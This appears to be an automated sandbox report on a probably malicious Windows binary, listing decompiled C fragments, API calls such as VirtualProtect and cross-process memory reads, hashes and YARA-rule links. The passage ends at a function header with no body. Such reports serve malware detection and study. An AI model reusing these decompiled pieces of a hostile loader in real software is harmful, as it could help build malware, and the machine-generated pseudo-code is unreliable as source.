                                                            0x00dd1962
                                                            0x00dd195b
                                                            0x00dd197b
                                                            0x00dd1980
                                                            0x00dd1985
                                                            0x00dd1985
                                                            0x00dd198b
                                                            0x00dd1991
                                                            0x00dd1996
                                                            0x00dd1996
                                                            0x00dd199b
                                                            0x00dd19a0
                                                            0x00dd19a0
                                                            0x00dd199b
                                                            0x00dd1925
                                                            0x00dd19a2
                                                            0x00dd19a8
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00DD56E3: SysAllocString.OLEAUT32(80000002), ref: 00DD573A
                                                              • Part of subcall function 00DD56E3: SysFreeString.OLEAUT32(00000000), ref: 00DD579F
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                            • SysFreeString.OLEAUT32(00DD5BA8), ref: 00DD19A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 986138563-0
                                                            • Opcode ID: 018ae83b18585d7a55aeb6dc4d4fe098ba05b2783c11a389f66ff3fc1b87a7d6
                                                            • Instruction ID: 107b6e2a517ff007e3dc1a792e72dc89b06db5471e4ec7762bb2c1680b630deb
                                                            • Opcode Fuzzy Hash: 018ae83b18585d7a55aeb6dc4d4fe098ba05b2783c11a389f66ff3fc1b87a7d6
                                                            • Instruction Fuzzy Hash: F5314876900119BFCB21DF69C8A8C9BBB79FFC9740714465AF8169B210D232ED51CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2AA4, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E00DD2AA4(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0xdda2d4; // 0x2bed5a8
				_t2 = _t42 + 0xddb468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0xdda2d4; // 0x2bed5a8
					_t6 = _t45 + 0xddb488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0xdda2d4; // 0x2bed5a8
							_t30 = _v8;
							_t12 = _t48 + 0xddb478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                                                            0x00dd2ab0
                                                            0x00dd2ab1
                                                            0x00dd2ab7
                                                            0x00dd2abe
                                                            0x00dd2ac0
                                                            0x00dd2ac4
                                                            0x00dd2ac8
                                                            0x00dd2aca
                                                            0x00dd2ad3
                                                            0x00dd2ad9
                                                            0x00dd2ae1
                                                            0x00dd2ae3
                                                            0x00dd2ae7
                                                            0x00dd2ae9
                                                            0x00dd2af6
                                                            0x00dd2afa
                                                            0x00dd2aff
                                                            0x00dd2b05
                                                            0x00dd2b0a
                                                            0x00dd2b12
                                                            0x00dd2b14
                                                            0x00dd2b16
                                                            0x00dd2b1c
                                                            0x00dd2b1c
                                                            0x00dd2b1f
                                                            0x00dd2b25
                                                            0x00dd2b25
                                                            0x00dd2b28
                                                            0x00dd2b2e
                                                            0x00dd2b2e
                                                            0x00dd2b35

                                                            APIs
                                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00DD2AE1
                                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00DD2B12
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Interface_ProxyQueryUnknown_
                                                            • String ID:
                                                            • API String ID: 2522245112-0
                                                            • Opcode ID: 42770c5ae35e70b8daa0ccc959ef44d2863483afd98a76effcfe34c5bfc52381
                                                            • Instruction ID: 47199d730b280b21977778dc82c0fac1cbef56fab32ee7a0e5bf22a702198d13
                                                            • Opcode Fuzzy Hash: 42770c5ae35e70b8daa0ccc959ef44d2863483afd98a76effcfe34c5bfc52381
                                                            • Instruction Fuzzy Hash: 56217275A01609EFCB00CFA4C848D9AB779EF88714B108685ED05DB315D731ED01CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045828B5, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,0458B7A0,-0000000C,00000000,00000000), ref: 045828E5
                                                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,0458B7A0,-0000000C,00000000), ref: 0458292C
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                            • String ID:
                                                            • API String ID: 552344955-0
                                                            • Opcode ID: dcd5c3f00f2f0ffadd9bd5dbafc9f31ba826dbed4f63bff3cc31eaaf9c928d8f
                                                            • Instruction ID: 281b66b5b5d6023f1c702f2b3313258e9049526cfb3a344e16d34b8815a9d89c
                                                            • Opcode Fuzzy Hash: dcd5c3f00f2f0ffadd9bd5dbafc9f31ba826dbed4f63bff3cc31eaaf9c928d8f
                                                            • Instruction Fuzzy Hash: E411A071900209ABDB11BFA9E844BAEBBB8FF90B54F10409DF800B7240DF75AA45AB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2989, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00DD29B1
                                                              • Part of subcall function 00DD18B7: SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                            • SafeArrayDestroy.OLEAUT32(?), ref: 00DD29FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ArraySafe$CreateDestroyFreeString
                                                            • String ID:
                                                            • API String ID: 3098518882-0
                                                            • Opcode ID: 891870843384f609977f0b42b291f6cef6bf818ead273d2047d7e026e6c8478f
                                                            • Instruction ID: 740e2c9b0878cfd33e91d97a4e16cd0575281f9bcf10453693f76e7f06359e7a
                                                            • Opcode Fuzzy Hash: 891870843384f609977f0b42b291f6cef6bf818ead273d2047d7e026e6c8478f
                                                            • Instruction Fuzzy Hash: FF115272900209BFDF11DF94CD45AEEBBB8EF14710F018066FA04E6261E3759A15DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD3D26, Relevance: 3.0, APIs: 2, Instructions: 47memorytimeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD3D26(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t15;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E00DD5691(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000; // executed
					_t15 = E00DD6CF1(__ecx, _a4, _a8, _t23); // executed
					_t20 = _t15;
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E00DD2A18(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0xdda290, 0, _t23);
				}
				return _t20;
			}










                                                            0x00dd3d26
                                                            0x00dd3d37
                                                            0x00dd3d3b
                                                            0x00dd3d94
                                                            0x00dd3d3d
                                                            0x00dd3d44
                                                            0x00dd3d4a
                                                            0x00dd3d4e
                                                            0x00dd3d53
                                                            0x00dd3d57
                                                            0x00dd3d5d
                                                            0x00dd3d6d
                                                            0x00dd3d7f
                                                            0x00dd3d7f
                                                            0x00dd3d8a
                                                            0x00dd3d8a
                                                            0x00dd3d9b

                                                            APIs
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,039C930C), ref: 00DD3D5D
                                                            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,039C930C), ref: 00DD3D8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                            • String ID:
                                                            • API String ID: 1500278894-0
                                                            • Opcode ID: 82dfa99aaf6c83b34c450c59071ee6400b827cca98d5b2c8fe73678597c9c7d1
                                                            • Instruction ID: b3b02199b07e8c55d91f03596d79171f9593393bbcee8e3fd3ed6a3a77315e85
                                                            • Opcode Fuzzy Hash: 82dfa99aaf6c83b34c450c59071ee6400b827cca98d5b2c8fe73678597c9c7d1
                                                            • Instruction Fuzzy Hash: B801A232100209BBDB215F58DC45F9A7F79FB84710F104026FE44AA265EB71D924DB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD5A8D, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(00DD462D), ref: 00DD5AA7
                                                              • Part of subcall function 00DD18B7: SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD5AE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 986138563-0
                                                            • Opcode ID: 3bbba4a55bf9601347f04eb321e0a2e97e30ea593ec052658634c9ae64737544
                                                            • Instruction ID: b5d00f71423e98f68462340ef082b7b9b05adc475b1a9fe64be8f55cc7150288
                                                            • Opcode Fuzzy Hash: 3bbba4a55bf9601347f04eb321e0a2e97e30ea593ec052658634c9ae64737544
                                                            • Instruction Fuzzy Hash: 73018F3250161ABBCB109FA8DC048AFBBB8EF44310B014022F905E6220E771AA149BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456CFBA, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 0456CFC4
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0456D000
                                                              • Part of subcall function 04562577: lstrlen.KERNEL32(?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625C4
                                                              • Part of subcall function 04562577: VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625D6
                                                              • Part of subcall function 04562577: lstrcpy.KERNEL32(00000000,?), ref: 045625E5
                                                              • Part of subcall function 04562577: VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625F6
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1872894792-0
                                                            • Opcode ID: 73dd2789e427f0c86089c0183b09708fc1eb42cf9328ef4f0ce111f5bc06d54b
                                                            • Instruction ID: 871ef1da27a4998db6c80560d7df9a026a86b4b6e6c8ae09bfb505fcd7342579
                                                            • Opcode Fuzzy Hash: 73dd2789e427f0c86089c0183b09708fc1eb42cf9328ef4f0ce111f5bc06d54b
                                                            • Instruction Fuzzy Hash: 2CF0EC762011159B87317F58A484C39F798FB85515315024EE95777300CE627C01E690
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045626E2, Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(0458BFFC), ref: 045626F7
                                                              • Part of subcall function 04561305: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04561330
                                                              • Part of subcall function 04561305: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0456133D
                                                              • Part of subcall function 04561305: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 045613C9
                                                              • Part of subcall function 04561305: GetModuleHandleA.KERNEL32(00000000), ref: 045613D4
                                                              • Part of subcall function 04561305: RtlImageNtHeader.NTDLL(00000000), ref: 045613DD
                                                              • Part of subcall function 04561305: RtlExitUserThread.NTDLL(00000000), ref: 045613F2
                                                            • InterlockedDecrement.KERNEL32(0458BFFC), ref: 0456271B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                            • String ID:
                                                            • API String ID: 1011034841-0
                                                            • Opcode ID: 199b61b0e9173f2282575fbdfb2b22385cc9f0b5b12864595f147d62520c86c9
                                                            • Instruction ID: b98ff37c9384e250cab44afe8a1fb81cc047a9f0e9b3648b05b27c19c1a546f7
                                                            • Opcode Fuzzy Hash: 199b61b0e9173f2282575fbdfb2b22385cc9f0b5b12864595f147d62520c86c9
                                                            • Instruction Fuzzy Hash: ACE01A322052229797327EB5A888F6AA756FB54AC2F00495CF483E2050EE20F844FE92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD695B, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xdda294) == 0) {
						E00DD38BC();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xdda294) == 1) {
						_t10 = E00DD6632(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                                            0x00dd6962
                                                            0x00dd6963
                                                            0x00dd6966
                                                            0x00dd6998
                                                            0x00dd699a
                                                            0x00dd699a
                                                            0x00dd6968
                                                            0x00dd6969
                                                            0x00dd697e
                                                            0x00dd6985
                                                            0x00dd6987
                                                            0x00dd6987
                                                            0x00dd6985
                                                            0x00dd6969
                                                            0x00dd69a2

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(00DDA294), ref: 00DD6970
                                                              • Part of subcall function 00DD6632: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DD6647
                                                            • InterlockedDecrement.KERNEL32(00DDA294), ref: 00DD6990
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Interlocked$CreateDecrementHeapIncrement
                                                            • String ID:
                                                            • API String ID: 3834848776-0
                                                            • Opcode ID: 973dec8710dd634fd8767159ed3c9b14d6841e96b7bf2cc4b09b9c7337128a94
                                                            • Instruction ID: 2553381798fc5b0def90ebccaba455d9dbd2137f12692b3c94c15e3186c34e71
                                                            • Opcode Fuzzy Hash: 973dec8710dd634fd8767159ed3c9b14d6841e96b7bf2cc4b09b9c7337128a94
                                                            • Instruction Fuzzy Hash: D6E04F352842325B87316B799C3476EFB549B10B80B08B417B489D13ACC631EC408AF2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045615BD, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0457B94E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0457B987
                                                              • Part of subcall function 0457B94E: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0457B9BD
                                                              • Part of subcall function 0457B94E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0457B9C9
                                                              • Part of subcall function 0457B94E: lstrcmpi.KERNEL32(?,00000000), ref: 0457BA06
                                                              • Part of subcall function 0457B94E: StrChrA.SHLWAPI(?,0000002E), ref: 0457BA0F
                                                              • Part of subcall function 0457B94E: lstrcmpi.KERNEL32(?,00000000), ref: 0457BA21
                                                              • Part of subcall function 0457B94E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0457BA72
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,045885A0,0000002C,04569E85,049B8E6E,?,00000000,0457765C), ref: 045615FC
                                                              • Part of subcall function 04566EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04566ED9
                                                              • Part of subcall function 04566EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04569375,00000000,00000000,00000028,00000100), ref: 04566EFB
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,045885A0,0000002C,04569E85,049B8E6E,?,00000000,0457765C,?,00000318), ref: 04561687
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                            • String ID:
                                                            • API String ID: 4138075514-0
                                                            • Opcode ID: 8fc2187f19a062337085d6058731c2e3b66571d83079152d7506e99b093c06b1
                                                            • Instruction ID: 08652e607c1bffe139b244b13d61d5f5fe3a6606b85f243d7d2e01cf3add71db
                                                            • Opcode Fuzzy Hash: 8fc2187f19a062337085d6058731c2e3b66571d83079152d7506e99b093c06b1
                                                            • Instruction Fuzzy Hash: CF210F75D01229EBCF119FA5DC80AEEBBB4FF08724F14812AE915B2250D7346A41EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2566, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 32%
                                                            			E00DD2566(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6f54e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                            0x00dd256d
                                                            0x00dd257a
                                                            0x00dd257c
                                                            0x00dd257f
                                                            0x00dd25c4
                                                            0x00dd25cc
                                                            0x00dd25d2
                                                            0x00dd25d6
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2583
                                                            0x00dd258e
                                                            0x00dd2591
                                                            0x00dd25c2
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2593
                                                            0x00dd2596
                                                            0x00dd259d
                                                            0x00dd25a1
                                                            0x00dd25aa
                                                            0x00dd25b2
                                                            0x00dd25e0
                                                            0x00dd25b4
                                                            0x00dd25b4
                                                            0x00000000
                                                            0x00dd25b4
                                                            0x00dd25b2
                                                            0x00dd259d
                                                            0x00dd25e3
                                                            0x00dd25ea
                                                            0x00dd25ea
                                                            0x00000000

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 14295a1fb0d3049bb849c58991e54a4b0fcba60db3cabfb74c84a3764258e3d7
                                                            • Instruction ID: 943f2d72cb21261cc8e57aa4d8ec0cbc71fe0fce247f0bef9786c6387259c1f2
                                                            • Opcode Fuzzy Hash: 14295a1fb0d3049bb849c58991e54a4b0fcba60db3cabfb74c84a3764258e3d7
                                                            • Instruction Fuzzy Hash: 17012D75901209FBDF209F96EC58DBEBFB8EBA4750F108067E904E2290D7718A40DB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1741, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 83%
                                                            			E6E4B1741(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E4B1344( &_v8,  &_v12,  *0x6e4b41cc ^ 0x13b675ce) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E4B20BB(_t22, _v8,  *0x6e4b41cc ^ 0x64927f78);
					}
					if(_t29 != 0) {
						_v12 = E6E4B105E(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e4b4190, 0, _v8);
				}
				return _t25;
			}








                                                            0x6e4b1741
                                                            0x6e4b1744
                                                            0x6e4b1745
                                                            0x6e4b175b
                                                            0x6e4b1764
                                                            0x6e4b1769
                                                            0x6e4b1782
                                                            0x6e4b176b
                                                            0x6e4b177e
                                                            0x6e4b177e
                                                            0x6e4b1786
                                                            0x6e4b1790
                                                            0x6e4b1798
                                                            0x6e4b17a0
                                                            0x6e4b17a2
                                                            0x6e4b17a2
                                                            0x6e4b17a0
                                                            0x6e4b17b2
                                                            0x6e4b17b2
                                                            0x6e4b17bd

                                                            APIs
                                                            • StrStrIA.KERNELBASE(00000000,6E4B1A94,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B1798
                                                            • HeapFree.KERNEL32(00000000,?,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B17B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: f0a70a19ec7978770c0a4d5ce7004342ac4d7172a843ec38103242bc648e4d7e
                                                            • Instruction ID: 62e7e75f9c0b97904113a6b894dbc30d3937bab183420b237e66fdad6f386308
                                                            • Opcode Fuzzy Hash: f0a70a19ec7978770c0a4d5ce7004342ac4d7172a843ec38103242bc648e4d7e
                                                            • Instruction Fuzzy Hash: B9018F76E10515BBDB009AF6DC44EEF77ADAF46641F100267E901E7344E631EA0687B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457A4E9, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000001,00000000,73B74D40,?,?,00000000,045681E2), ref: 0457A4FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 17583365fe1741b87ee1136609480cb0e4d9ae70a562c29de2c5c18559cc11c5
                                                            • Instruction ID: 867e1bbf75ae88fdc47a995929b1d5e420c4f8961cfa7797725f5f369220723d
                                                            • Opcode Fuzzy Hash: 17583365fe1741b87ee1136609480cb0e4d9ae70a562c29de2c5c18559cc11c5
                                                            • Instruction Fuzzy Hash: 10313C72A00105EFDF11DF98E88199DB7B5FB44724F54806AE605AB210DA34BD45EB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD76D4, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
